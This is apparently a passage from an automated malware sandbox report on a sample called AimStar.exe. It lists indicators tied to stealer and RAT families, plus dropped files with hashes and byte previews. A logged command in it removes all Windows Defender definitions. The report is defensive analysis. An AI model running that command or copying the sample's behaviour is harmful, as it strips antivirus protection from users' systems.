162.159.128.233	file.exe	Get hash	malicious	LummaC, Glupteba, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, zgRAT	Browse	discord.com/phpMyAdmin/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	L988Ph5sKX.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	kj93GnZHBS.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	ANuh30XoVu.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	rivalsanticheat.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	rename_me_before.exe	Get hash	malicious	Python Stealer, Exela Stealer	Browse	208.95.112.1
	vEtDFkAZjO.exe	Get hash	malicious	RL STEALER, StormKitty	Browse	208.95.112.1
	Fizzy Loader.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	208.95.112.1
	Extreme Injector v3.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	VegaStealer_v2.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer	Browse	208.95.112.1
	SharcHack.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer, Xmrig	Browse	208.95.112.1
discord.com	rename_me_before.exe	Get hash	malicious	Python Stealer, Exela Stealer	Browse	162.159.137.232
	Fizzy Loader.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	162.159.138.232
	Jx6bD8nM4qW9sL3v.exe	Get hash	malicious	Unknown	Browse	162.159.128.233
	dsoft.exe	Get hash	malicious	Python Stealer, Creal Stealer	Browse	162.159.138.232
	DHL AWB-documents.lnk	Get hash	malicious	Divulge Stealer	Browse	162.159.138.232
	http://mee6.xyz	Get hash	malicious	Unknown	Browse	162.159.138.232
	YF3YnL4ksc.exe	Get hash	malicious	Unknown	Browse	162.159.136.232
	YF3YnL4ksc.exe	Get hash	malicious	Unknown	Browse	162.159.136.232
	arm.elf	Get hash	malicious	Unknown	Browse	162.159.137.232
	webhook.exe	Get hash	malicious	Unknown	Browse	162.159.138.232

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TUT-ASUS	L988Ph5sKX.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	kj93GnZHBS.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	ANuh30XoVu.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	rivalsanticheat.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	rename_me_before.exe	Get hash	malicious	Python Stealer, Exela Stealer	Browse	208.95.112.1
	vEtDFkAZjO.exe	Get hash	malicious	RL STEALER, StormKitty	Browse	208.95.112.1
	Fizzy Loader.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	208.95.112.1
	Extreme Injector v3.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	VegaStealer_v2.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer	Browse	208.95.112.1
	SharcHack.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer, Xmrig	Browse	208.95.112.1
CLOUDFLARENETUS	7FEGBYFBHFBJH32.exe	Get hash	malicious	44Caliber Stealer, BlackGuard, Rags Stealer	Browse	188.114.96.3
	16oApcahEa.exe	Get hash	malicious	Babuk, Djvu	Browse	104.21.32.1
	UhsjR3ZFTD.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	544WP3NHaP.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	172.67.220.198
	KRNL.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	01012025.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.198.102
	SET_UP.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	test.doc.bin.doc	Get hash	malicious	Unknown	Browse	104.21.21.16
	test.doc.bin.doc	Get hash	malicious	Unknown	Browse	104.21.21.16

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\_MEI72842\VCRUNTIME140.dll	DChOtFdp9T.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse
	user.exe	Get hash	malicious	Unknown	Browse
	HX Design.exe	Get hash	malicious	Python Stealer, Blank Grabber	Browse
	YgJ5inWPQO.exe	Get hash	malicious	AsyncRAT, XWorm	Browse
	wp-s2.exe	Get hash	malicious	Python BackDoor	Browse
	wp-s2.exe	Get hash	malicious	Python BackDoor	Browse
	wp-cent.exe	Get hash	malicious	Python BackDoor	Browse
	wp-cent.exe	Get hash	malicious	Python BackDoor	Browse
	WTvNL75dCr.exe	Get hash	malicious	Python BackDoor	Browse
	WTvNL75dCr.exe	Get hash	malicious	Python BackDoor	Browse

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Download File

Process:	C:\Windows\System32\SIHClient.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 4761 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
Category:	dropped
Size (bytes):	4761
Entropy (8bit):	7.945585251880973
Encrypted:	false
SSDEEP:	96:6ZUpZsm0HwZ8FLSeXs+aiL9qcZ7KtlAD1GlNHgdkVI5F11AcNmwkVFzGz6ENhZC7:62T0QOLl8vAqcZ7K3AUNAdx5FAx9VEOj
MD5:	77B20B5CD41BC6BB475CCA3F91AE6E3C
SHA1:	9E98ACE72BD2AB931341427A856EF4CEA6FAF806
SHA-256:	5511A9B9F9144ED7BDE4CCB074733B7C564D918D2A8B10D391AFC6BE5B3B1509
SHA-512:	3537DA5E7F3ABA3DAFE6A86E9511ABA20B7A3D34F30AEA6CC11FEEF7768BD63C0C85679C49E99C3291BD1B552DED2C6973B6C2F7F6D731BCFACECAB218E72FD4
Malicious:	false
Preview:	MSCF............,...................O..................YWP .disallowedcert.stl.lJ..B...CK.wTS.....{.&Uz.I."E".HS@. .P.!.....E. .DQ..... EDA.H. E..""/.s<.s.9.....&#.{~k.VV..7@......b.R....MdT..B.L..%.C......" ....%.4%..%.B..T.d...S.....pem..$....&.q.`.+...E..C.....$.\|.A.!~d.H>w%S$...QC't..;..<..R@....2. .l..?..c..A....Ew...l..K$.. ~...'......Mt^c..s.Y%..}......h......m....h.......~d...,...=ge3.....2%..(...T..!].....!C~.X..MHU.o[.z].Y...&lXG;uW.:...2!..][\/.G..]6#.I...S..#F.X.k.j.....)Nc.].t^.-l.Y...4?.b...rY....A......7.D.H\.R...s.L,.6.\|.....VQ....<........... [Z....].N0LU.X........6..C\....F.....KbZ..^=.@.B..MyH...%.2.>...]..E.....sZ.f..3z.].Y.t.d$.....P...,. .~..mNZ[PL.<....d..+...l.-...b.^....6F..z.&.;D.._..c."...d..... k9....60?&..Y.v.dgu...{.....{..d=..$......@^..qA..*uJ..@W.V..eC..AV.e+21...N.{.]..]..f]..`Z.....]2.....x..f..K...t. ...e.V.U.$PV..@6W\_nsm.n.........A<.......d....@f..Z... >R..k.....8..Y....E>..2o7..........c..K7n....

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Download File

Process:	C:\Windows\System32\SIHClient.exe
File Type:	data
Category:	dropped
Size (bytes):	340
Entropy (8bit):	3.1356292262615493
Encrypted:	false
SSDEEP:	6:kK6m5+7DYUN+SkQlPlEGYRMY9z+s3Ql2DUeXJlOW1:ScLkPlE99SCQl2DUeXJlOA
MD5:	A9268A0E0A7977EEDF4FD55FD9705B6C
SHA1:	17591DDA5B9CF8B1236F47D3202395D0DACF4D3B
SHA-256:	572C81F5DD779D1E873D380037D789931B04FFE0492D1C5F884F52D79DCAABD5
SHA-512:	DA15B24B6C9776A45A9B0C1C2C90685E23D8A66635F58980246C4F6BC6F4500FA17C8C18ECA108309CE051360ACF4069D592E3B70E29DFA4E7DD4FB273FB33A9
Malicious:	false
Preview:	p...... ........".l.\..(....................................................... ........~..MG......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".0.6.c.f.c.c.5.4.d.4.7.d.b.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\ \Display (1).png

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	691532
Entropy (8bit):	7.929016665354888
Encrypted:	false
SSDEEP:	12288:ir96sM1yjLJWrJc8B3BQ+XU/GqLqMnkETry2spscMJ0OzHRaWLH1CC6jR:ir9NJjL4JcEBXUum/r1JR7RaWCnR
MD5:	571BC85ADDABE4F5AD284AD392D52F2A
SHA1:	3238A79E68A71DA0C324F86192F2E2F6441244F1
SHA-256:	40BC5F4B433253789543BD7A431FCF8A067738D1B58F8EBD5A2AAE3E5A9D567C
SHA-512:	3E4EE402D01324D489A63FD060CD46600F7948CDA1C46F040BEA3510B5DC5CDF45317BE577D7D8E1A7B5DD4FC6CD19C7C933FBEF5DE83EDE341FA3975D46C8D5
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..y.mU........l...fk.....dd.}/3#".{.Qd...u]..QP....D.9.J!u..E..A. R.X.j.RJ.T...7....[c.U..9...6......D._.c.N.W...><..;=...Og...P..-..S.wXd.t??:.S.;..t/..G....{M..8.:i..OU..=.a..$........y1u\|L.3O...{\|..Y..HL.+..H..t.....;.....5.#.m...4........N....L..~:/.>...r.O&J.....TA.......o......G.E....2.....@....90..{[.>x..\|..9.}........F..?..t..{~P..?1.0..T7....A..;....{.q......1So.+3....\|..bK...LY..b..........6...c.7..2..;f.y.......[..o..Z...YL.....n.#1...s@.K...:..3...Ru....j.....).=S)?.o..R<.......C..7e.....6....W..Mg.sc5...2....<.t.rl.>7UK_.j.N...+}.7VS{.Puw....v].._....RLkA=..o.V...i\J,.1....;.\.s...9.].....1...%.]_-.=...zz....Lw.k...n....Ms.e\.[.k:w.k..W.qz..}v.:3..UUw...e...Jcg.+s....,.5}n..2.#.<.....t..bKvJ.......@...S\|..Oh>..w2.._...3.0..U.....v..m..ose5..w.\|....&.u....{.9,...ks.Y.e\.].m.m...Q.%[..-....J....T'...r+.O....z.M/..[\..:._.c....Y

C:\Users\user\AppData\Local\Temp\1KgHr.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe
File Type:	RAR archive data, v5
Category:	dropped
Size (bytes):	725246
Entropy (8bit):	7.999732951070102
Encrypted:	true
SSDEEP:	12288:TTVC7xpbYpBSmhXVRPxb/zFFyRp5W1URFMbDtfZU63PnsbHm+EA73NwjogDJK7Qn:TTkx9iBS67PBFsDWOoZfq63vAHm+EA7i
MD5:	E9EB68A9E3C4230ADAF7E0CBC5B837A0
SHA1:	76B3DE65C9B184482A6E6171F4C794CFC9A25299
SHA-256:	831B64BCD5518C71DFB1137E309D366D02826B402975A92720DEEA5575225374
SHA-512:	9626F8C801B25691E4F710195D0B7339A3F41C498661044CCE7828FB42ED67A77AFC5BD9EA6B24A4968E9125502FE5D2B020C2EE7AFEF78BE867224FA0F2F991
Malicious:	true
Preview:	Rar!....:t3=!.......o.WS...'........Z../4Y`..m..._..(JJ..`....K.t..m.G..)G._.Qq....N.........C...k3E.m..Ru........vh.X..i.{pf.]..:;...+.6...h.......=...U.........7...0T....e...l.'......_.{.)....2..5.K.D.wb..5g.u.T..Wa.}B..g.P..Rv....$."R4."1.j..zJy.n...$k.t. ..-.X.RA.>.`....h}:%s..,.....8-...++....+.......E,.1lc....A..5(.Y...T..M}j..K"#.OU.....!.2K..1..\|b......:u.C.T".f.z i..9.(....!n....."...%..E.9.M......(..`.~.....4.qi5..T...&`>...C..R.4.J&..[.u3....Df.....L0.:...IJ^gH.7.\. Q.h..)xI......8..!...v.....{.s..1.sZ.Z.yk.[.*5.c....qX.........>..8.;`.?.F....;.].Z...Xt.......\|..Uv.....&O..h.S'((w.A...6A...m....H.e...I..F......\|.U....ur..&.>..(g.A$...P.H.h.TY@.....P@().b.i~..v.r...J{.....pc..Ul..0.'..\|cY....H.X"w[..C5NH.G...3m...p..u.@t......Cr<h...(...;.5.6.B.^.......O...(.i..sad...B..F&T....Lp(#r2..'-.BB..Q.."........-+,K;...mD..X .{.v....&g...y....Um-.gU.$..O.r...\|U...v~.A.#...I."..,V..b.,.^q._.U..c,o_..:-9. .$...'Fe.../.....s.J#.(Ux.C,u$.Kg..

C:\Users\user\AppData\Local\Temp\MpCmdRun.log

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	894
Entropy (8bit):	3.1071032960175797
Encrypted:	false
SSDEEP:	12:Q58KRBubdpkoPAGdjrlsfNdlYZk9+MlWlLehW51ICEsfNdl4I:QOaqdmOFdjrl8Ndlf+kWResLIN8NdlF
MD5:	4A2D56D86EE848243ED09B3CDC0F2A99
SHA1:	74E6CE35222A7AD9248B22F7F67BA84E4409CB7D
SHA-256:	6497B6E112E7354FA38B6842ED1C94714A70B82734F52D7B4D49B8C6FB7635C6
SHA-512:	0720B41A92E51CE8A483FDDA76D50F0B43FC3ABB93E8BAB7132B7C9F035B5938E6F0C0583B9B1F8327544ED539FFCB0C0FE9B27661882BCA71380E0C63EFF581
Malicious:	false
Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. W.e.d. .. J.a.n. .. 0.1. .. 2.0.2.5. .1.6.:.1.2.:.1.7.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. W.e.d. .. J.a.n. .. 0.1. .. 2.0.2.5. .1.6.:.1.2.:.1.7.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

C:\Users\user\AppData\Local\Temp\RES1C05.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4be, 9 symbols, created Wed Jan 1 23:03:24 2025, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1380
Entropy (8bit):	4.125646021860696
Encrypted:	false
SSDEEP:	24:H5DW9UOinok9H4FwK3rZZzNwI+ycuZhNCakS6PNnqSGd:pjo0hK3rZZm1ulCa32qS2
MD5:	8CE64FCC4F9DE15CF1D1DFAF38F870B7
SHA1:	CBE4628797B755730A69FBC105A41459D183DDF2
SHA-256:	E218FB400D6FE89D687835CF06FD10E6D618E6793C9CD0942C38F6EE407C31D1
SHA-512:	A39E17073E985C8C74C8703C6D52C000A3EB03C536A7F19B06D71DDEB5625C8BC85E6FE1E607B4F0794512BFF6CFC18383A36DD269ECD7F1B6F2E495B5BCD298
Malicious:	false
Preview:	L.....ug.............debug$S............................@..B.rsrc$01........X.......d...........@..@.rsrc$02........P...n...............@..@........U....c:\Users\user\AppData\Local\Temp\hrvhwpsf\CSC4E15ECD8FE3B4FA09888C7495932E1F6.TMP...................JR].?..7~.............5.......C:\Users\user\AppData\Local\Temp\RES1C05.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.r.v.h.w.p.s.f...d.l.l.....(.....

C:\Users\user\AppData\Local\Temp\_MEI72842\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\Desktop\AimStar.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	120400
Entropy (8bit):	6.6017475353076716
Encrypted:	false
SSDEEP:	1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
MD5:	862F820C3251E4CA6FC0AC00E4092239
SHA1:	EF96D84B253041B090C243594F90938E9A487A9A
SHA-256:	36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
SHA-512:	2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: DChOtFdp9T.exe, Detection: malicious, Browse Filename: user.exe, Detection: malicious, Browse Filename: HX Design.exe, Detection: malicious, Browse Filename: YgJ5inWPQO.exe, Detection: malicious, Browse Filename: wp-s2.exe, Detection: malicious, Browse Filename: wp-s2.exe, Detection: malicious, Browse Filename: wp-cent.exe, Detection: malicious, Browse Filename: wp-cent.exe, Detection: malicious, Browse Filename: WTvNL75dCr.exe, Detection: malicious, Browse Filename: WTvNL75dCr.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............\|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI72842\_bz2.pyd

Download File

Process:	C:\Users\user\Desktop\AimStar.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	51192
Entropy (8bit):	7.762871670400831
Encrypted:	false
SSDEEP:	1536:fTvumeSe2uD4e4elA5woMImLVQhyUzR9AfIIoT:LvxeSeVd4elAqImLVQLX
MD5:	E1B31198135E45800ED416BD05F8362E
SHA1:	3F5114446E69F4334FA8CDA9CDA5A6081BCA29ED
SHA-256:	43F812A27AF7E3C6876DB1005E0F4FB04DB6AF83A389E5F00B3F25A66F26EB80
SHA-512:	6709C58592E89905263894A99DC1D6AAFFF96ACE930BB35ABFF1270A936C04D3B5F51A70FB5ED03A6449B28CAD70551F3DCCFDD59F9012B82C060E0668D31733
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4@..4@..4@..L...4@..A..4@....4@..C..4@..D..4@..E..4@.v.A..4@..A..4@..4A.4@.v.M..4@.v.@..4@.v....4@.v.B..4@.Rich.4@.................PE..d....WOg.........." ...*.............d....................................................`.............................................H.................... .. ...................................................p..@...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI72842\_ctypes.pyd

Download File

Process:	C:\Users\user\Desktop\AimStar.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	65016
Entropy (8bit):	7.844438023002735
Encrypted:	false
SSDEEP:	1536:sgnr/ptw33m0QDInUz2fH3JrlFCFfLaImyP7TyUzR9zfIP0:fnrhtoW0QSu+EFfWImyP7UM
MD5:	B6262F9FBDCA0FE77E96A9EED25E312F
SHA1:	6BFB59BE5185CEACA311F7D9EF750A12B971CBD7
SHA-256:	1C0F9C3BDC53C2B24D5480858377883A002EB2EBB57769D30649868BFB191998
SHA-512:	768321758FC78E398A1B60D9D0AC6B7DFD7FD429EF138845461389AAA8E74468E4BC337C1DB829BA811CB58CC48CFFF5C8DE325DE949DDE6D89470342B2C8CE8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8.Z.\|.4.\|.4.\|.4.u...z.4.m.5.~.4.m.7.x.4.m.0.t.4.m.1.p.4...5.~.4..x0.}.4..x5.z.4...5...4.\|.5...4...9.z.4...4.}.4....}.4...6.}.4.Rich\|.4.........PE..d....WOg.........." ...*.............J.......................................p............`.........................................Hl.......i.......`.......................l.......................................V..@...........................................UPX0....................................UPX1................................@....rsrc........`......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI72842\_decimal.pyd

Download File

Process:	C:\Users\user\Desktop\AimStar.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	122088
Entropy (8bit):	7.904008472378221
Encrypted:	false
SSDEEP:	1536:B3UVX099NzjRjBmFTSki6cbA8VDEcZJDY/LB7cMvVPcc1di9ImvqxEMmTyUzR98K:B3UWVzVjp6cb+SqOMtPc9ImvqxExn
MD5:	9CFB6D9624033002BC19435BAE7FF838
SHA1:	D5EECC3778DE943873B33C83432323E2B7C2E5C2
SHA-256:	41B0B60FE2AA2B63C93D3CE9AB69247D440738EDB4805F18DB3D1DAA6BB3EBFF
SHA-512:	DD6D7631A54CBD4ABD58B0C5A8CB5A10A468E87019122554467FD1D0669B9A270650928D9DE94A7EC059D4ACEBF39FD1CFCEA482FC5B3688E7924AAF1369CC64
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\lUT..;...;...;..u....;...:...;...8...;...?...;...>...;...:...;.j.:...;...:...;...8...;...6...;...;...;.......;...9...;.Rich..;.........................PE..d....WOg.........." ...*.....0.......p....................................................`......................................................................+..........\........................................\|..@...........................................UPX0....................................UPX1.............~..................@....rsrc....0.......$..................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI72842\_hashlib.pyd

Download File

Process:	C:\Users\user\Desktop\AimStar.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	37368
Entropy (8bit):	7.62885373795624
Encrypted:	false
SSDEEP:	768:WzzaDWoin9vvSfhb8pnTImvI9qJyUFRYT2Ip4ygCxf1mlzzF:WzOW6JQTImvI9WyUzR9yRfIPF
MD5:	0B214888FAC908AD036B84E5674539E2
SHA1:	4079B274EC8699A216C0962AFD2B5137809E9230
SHA-256:	A9F24AD79A3D2A71B07F93CD56FC71958109F0D1B79EEBF703C9ED3AC76525FF
SHA-512:	AE7AEE8A11248F115EB870C403DF6FC33785C27962D8593633069C5FF079833E76A74851EF51067CE302B8EA610F9D95C14BE5E62228EBD93570C2379A2D4846
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N.A..............K.............................................x.........................................'.............Rich............PE..d....WOg.........." ...*.P..........@........................................@............`.........................................\|;..P....9.......0.......................;......................................@+..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........0.......R..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI72842\_lzma.pyd

Download File

Process:	C:\Users\user\Desktop\AimStar.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	89592
Entropy (8bit):	7.901406061659478
Encrypted:	false
SSDEEP:	1536:+E29OZvi4bwTlI+rWNp+UavNhym9PcIbiQZWL22eMBYqj8uyDM/2Im01rqyUzR9u:+MviSJj+JymBBBZIheEjMoOIm01rtWO
MD5:	ADEAA96A07B7B595675D9F351BB7A10C
SHA1:	484A974913276D236CB0D5DB669358E215F7FCED
SHA-256:	3E749F5FAD4088A83AE3959825DA82F91C44478B4EB74F92387FF50FF1B8647D
SHA-512:	5D01D85CDA1597A00B39746506FF1F0F01EEEA1DC2A359FCECC8EE40333613F7040AB6D643FDAEE6ADAA743D869569B9AB28AE56A32199178681F8BA4DEA4E55
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..C~...~...~...w.?.z...o3..\|...o3..}...o3..v...o3..r....3..}....4..\|...~........3..D....3.......3S......3......Rich~...........PE..d....WOg.........." ...*. .......p........................................................`.........................................4...L....................0.........................................................@...........................................UPX0.....p..............................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI72842\_queue.pyd

Download File

Process:	C:\Users\user\Desktop\AimStar.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	29552
Entropy (8bit):	7.411884404531348
Encrypted:	false
SSDEEP:	768:3e8XPAVnB8JpeEIm9UtEJyUFRYT2Ip4mTxf1mlBqsovFfY:TgB8CEIm9Ut4yUzR9GfIQsotfY
MD5:	766820215F82330F67E248F21668F0B3
SHA1:	5016E869D7F65297F73807EBDAF5BA69B93D82BD
SHA-256:	EF361936929B70EF85E070ED89E55CBDA7837441ACAFEEA7EF7A0BB66ADDEEC6
SHA-512:	4911B935E39D317630515E9884E6770E3C3CDBD32378B5D4C88AF22166B79B8EFC21DB501F4FFB80668751969154683AF379A6806B9CD0C488E322BD00C87D0E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T.............s......m.......m.......m.......m......{m.......j..............{m......{m......{m......{m......Rich............PE..d....WOg.........." ...*.0..........@.....................................................`.............................................L.......P............`..l...........<.......................................@...@...........................................UPX0....................................UPX1.....0.......,..................@....rsrc................0..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI72842\_socket.pyd

Download File

Process:	C:\Users\user\Desktop\AimStar.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	46584
Entropy (8bit):	7.708630278879131
Encrypted:	false
SSDEEP:	768:pOVO07RbhED2LEIuo4OCYkbaEts+Z85iEsaAEwAptjvImywAmmJyUFRYT2Ip4Ep5:GPkD2LEIuo4E5CpZEbjvImywAmKyUzRs
MD5:	65CD246A4B67CC1EAB796E2572C50295
SHA1:	053FA69B725F1789C87D0EF30F3D8997D7E97E32
SHA-256:	4ECD63F5F111D97C2834000FF5605FAC61F544E949A0D470AAA467ABC10B549C
SHA-512:	C5BF499CC3038741D04D8B580B54C3B8B919C992366E4F37C1AF6321A7C984B2E2251C5B2BC8626AFF3D6CA3BF49D6E1CCD803BD99589F41A40F24EC0411DB86
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
